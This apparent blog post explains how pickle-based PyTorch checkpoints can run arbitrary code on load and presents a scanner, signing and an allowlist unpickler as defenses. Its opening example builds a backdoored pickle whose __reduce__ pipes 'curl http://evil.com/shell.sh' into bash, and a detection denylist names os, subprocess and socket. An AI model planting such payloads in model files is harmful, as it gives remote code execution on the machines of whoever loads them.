# Your PyTorch Model File Can Execute Arbitrary Code — Here's How I Built a Scanner to Detect It

> Source: <https://dev.to/pooja_kiran_e3e03bf9ffeed/your-pytorch-model-file-can-execute-arbitrary-code-heres-how-i-built-a-scanner-to-detect-it-5cec>
> Published: 2026-05-19 03:02:18+00:00

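Every time you run `torch.load("model.pt")` on a pickle-based checkpoint, you're running a program, not just reading data. Not "could theoretically execute": the unpickler actually executes the opcodes in the file, and those opcodes can call any importable Python function unless loading is restricted (for example with `weights_only=True`, the default since PyTorch 2.6). The pickle format that PyTorch uses for serialization has a built-in code execution mechanism, and it's trivial to exploit.

I built a tool to detect this. Here's what I learned.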
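## The Attack: 4 Lines of Code

```python
import pickle, os

class Backdoor:
    def __reduce__(self):
        # pickle will call os.system with this argument at load time
        return (os.system, ("curl http://evil.com/shell.sh | bash",))

payload = pickle.dumps(Backdoor())  # building the payload does not run the command
```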
That's it. When someone loads this pickle, whether it's disguised as a model checkpoint, a dataset, or a config file, the command executes. No warnings. No prompts. Full RCE.

The `__reduce__` method tells pickle how to reconstruct an object. But "reconstruct" means "call this function with these arguments." Any function. Any arguments.
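
To see the mechanism without running anything dangerous, here is a minimal sketch that swaps `os.system` for the harmless built-in `sorted`. The class name `Harmless` is made up for illustration. The point is that `pickle.loads` returns whatever the named function returns, not an instance of the class that was pickled.

```python
import pickle


class Harmless:
    def __reduce__(self):
        # Benign stand-in for os.system: ask pickle to call sorted([3, 1, 2]).
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Harmless())

# Unpickling performs the call and hands back its result.
result = pickle.loads(payload)
print(type(result).__name__, result)  # list [1, 2, 3]
```

Replace `sorted` with `os.system` and the list with a shell command, and the same two lines of loading code become remote code execution.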
## Why This Matters for ML

ML models are distributed as serialized files, and PyTorch checkpoints are pickle-based. In 2023, Hugging Face found malicious pickles in uploaded models. This isn't theoretical; it's happening.
## How Detection Works: Opcode Disassembly

Python's `pickletools` module can disassemble pickle bytecode without executing it. Here's what a malicious pickle looks like at the opcode level:

```text
PROTO 4
FRAME 25
SHORT_BINUNICODE 'nt'       ← module name (os on Windows)
SHORT_BINUNICODE 'system'   ← function name
STACK_GLOBAL                ← load nt.system as callable
SHORT_BINUNICODE 'whoami'   ← argument
TUPLE1                      ← pack into tuple
REDUCE                      ← CALL the function
STOP
```
The key insight: `STACK_GLOBAL` loads a callable by module + name, and `REDUCE` calls it. If the module is `os` (which shows up as `nt` or `posix` in real bytecode), `subprocess`, `socket`, or `builtins`, the pickle gets flagged as malicious.
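
The idea can be sketched with nothing but the standard library. This is a simplified heuristic and not the implementation in Model-Supply-Chain-Auditor: the function name `find_suspicious_imports` and the denylist are assumptions made for illustration, and a determined attacker can evade a check this naive (for example by fetching strings from the memo instead of pushing them right before `STACK_GLOBAL`).

```python
import os
import pickle
import pickletools

# Hypothetical denylist for this sketch. "nt" and "posix" are the names
# os.system really pickles under; "__builtin__" is how "builtins" is
# written by protocols 0-2 with the default fix_imports=True.
SUSPICIOUS_MODULES = {
    "os", "nt", "posix", "subprocess", "socket", "builtins", "__builtin__",
}
STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def find_suspicious_imports(data: bytes) -> list:
    """Return 'module.name' for each suspicious import, without unpickling."""
    findings = []
    recent_strings = []  # string constants pushed so far, most recent last
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPCODES:
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # Protocols 0-3: the argument is one "module name" string.
            module, _, name = arg.partition(" ")
            if module.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Protocol 4+: module and name were pushed as two strings.
            module, name = recent_strings[-2], recent_strings[-1]
            if module.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(f"{module}.{name}")
    return findings


class Backdoor:
    def __reduce__(self):
        return (os.system, ("whoami",))


# pickle.dumps only serializes; nothing is executed here or in the scan.
payload = pickle.dumps(Backdoor(), protocol=4)
print(find_suspicious_imports(payload))  # e.g. ['posix.system'] on Linux
```

Because `pickletools.genops` only decodes opcodes, the payload is never loaded, which is what makes this kind of scan safe to run on untrusted files.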
## My Scanner

I built [Model-Supply-Chain-Auditor](https://github.com/poojakira/Model-Supply-Chain-Auditor) to parse these opcodes and flag dangerous patterns:

```python
from src.scanners import scan_pickle_bytes

# suspicious_data: the raw bytes of the pickle under inspection
result = scan_pickle_bytes(suspicious_data)
print(result.risk_level)  # "malicious"
print(result.findings)    # ["DANGEROUS import: nt.system", "Code execution via REDUCE"]
```
It handles pickle protocols 0-5, including the protocol 4+ STACK_GLOBAL pattern where module and name are pushed to the stack separately.
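
The protocol difference is easy to observe directly. The following sketch (the helper name `import_opcodes` is made up here) pickles the built-in `len` under every protocol and reports which import opcode the standard library emits.

```python
import pickle
import pickletools

IMPORT_OPCODES = {"GLOBAL", "STACK_GLOBAL"}


def import_opcodes(obj, protocol):
    """Names of the import opcodes pickle emits for obj at a given protocol."""
    data = pickle.dumps(obj, protocol=protocol)
    return [
        op.name
        for op, _arg, _pos in pickletools.genops(data)
        if op.name in IMPORT_OPCODES
    ]


# Protocols 0-3 use GLOBAL with an inline "module name" argument;
# protocols 4 and 5 push two strings and then use STACK_GLOBAL.
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
    print(protocol, import_opcodes(len, protocol))
```

A scanner that only looks for one of the two opcodes will miss pickles written with the other, and legacy pickles can also import through the older `INST` opcode, so covering all protocols means handling each form.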
## What I Got Wrong Initially

On Windows, `os.system` pickles as `nt.system`. On Linux, it's `posix.system`. My first version only checked for `os` and missed both platform-specific variants. Lesson: always test against the actual bytecode output, not what you think it should be.
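
You can check this on your own machine in a few lines. The sketch below prints the module name Python records for `os.system` and then pulls the string constants out of its pickle; the helper `pickled_strings` is a hypothetical name used only here.

```python
import os
import pickle
import pickletools

# pickle records the function's __module__, which is not "os".
print(os.system.__module__)  # "posix" on Linux/macOS, "nt" on Windows


def pickled_strings(obj, protocol=4):
    """String constants pushed while pickling obj (module, then name)."""
    data = pickle.dumps(obj, protocol=protocol)
    return [
        arg
        for op, arg, _pos in pickletools.genops(data)
        if op.name == "SHORT_BINUNICODE"
    ]


print(pickled_strings(os.system))
```

Running the same snippet on Windows and Linux gives two different module names for the same source-level call, which is why a denylist has to be built from observed bytecode.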
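## The Defense: Model Signing

Detection is reactive. The proactive defense is cryptographic signing: the publisher signs the model file, and the consumer verifies that signature before loading anything. If the signature doesn't match, don't load it.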
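
Here is a minimal sketch of the verify-before-load pattern using only the standard library. It substitutes HMAC-SHA256 (a shared-secret MAC) for a true public-key signature so that it stays self-contained; a real deployment would more likely use an asymmetric scheme such as Ed25519 so that verifiers never hold the signing key. The function names and the key are assumptions for illustration, not the Model-Supply-Chain-Auditor API.

```python
import hashlib
import hmac
import pickle


def sign_bytes(data: bytes, key: bytes) -> str:
    """Return a hex HMAC-SHA256 tag over the serialized model bytes."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_bytes(data: bytes, key: bytes, signature: str) -> bool:
    """Constant-time comparison of the expected and provided tags."""
    return hmac.compare_digest(sign_bytes(data, key), signature)


def load_if_signed(data: bytes, key: bytes, signature: str):
    """Unpickle only after the tag checks out; otherwise refuse."""
    if not verify_bytes(data, key, signature):
        raise ValueError("signature mismatch; refusing to load")
    return pickle.loads(data)


key = b"demo-key-do-not-use-in-production"  # hypothetical shared secret
blob = pickle.dumps({"weights": [0.1, 0.2]})
tag = sign_bytes(blob, key)

print(load_if_signed(blob, key, tag))
```

The important design choice is the order of operations: the check runs over the raw bytes before `pickle.loads` ever sees them, so a tampered file is rejected without being parsed.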
## What This Doesn't Solve

## The Takeaway

If you're downloading model files from the internet, scan them before you load them, and don't load anything whose signature doesn't match.
The ML community is slowly moving toward safer serialization. Until then, every .pt file is a potential attack vector.
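
For pickles you do have to load in the meantime, one stopgap described in the Python `pickle` documentation is to restrict which globals the unpickler may import. The sketch below is an assumption-laden illustration of that technique, not part of the scanner: the allowlist contents and the names `AllowlistUnpickler` and `restricted_loads` are made up for the example.

```python
import collections
import io
import os
import pickle

# Hypothetical allowlist: only these (module, name) pairs may be imported.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL / STACK_GLOBAL before anything is invoked.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses any import outside the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


safe = pickle.dumps(collections.OrderedDict(a=1))
print(restricted_loads(safe))

try:
    restricted_loads(pickle.dumps(os.system))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

An allowlist fails closed: anything the author did not anticipate is rejected, which is the opposite trade-off from a denylist-based scanner.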
Code: <https://github.com/poojakira/Model-Supply-Chain-Auditor>
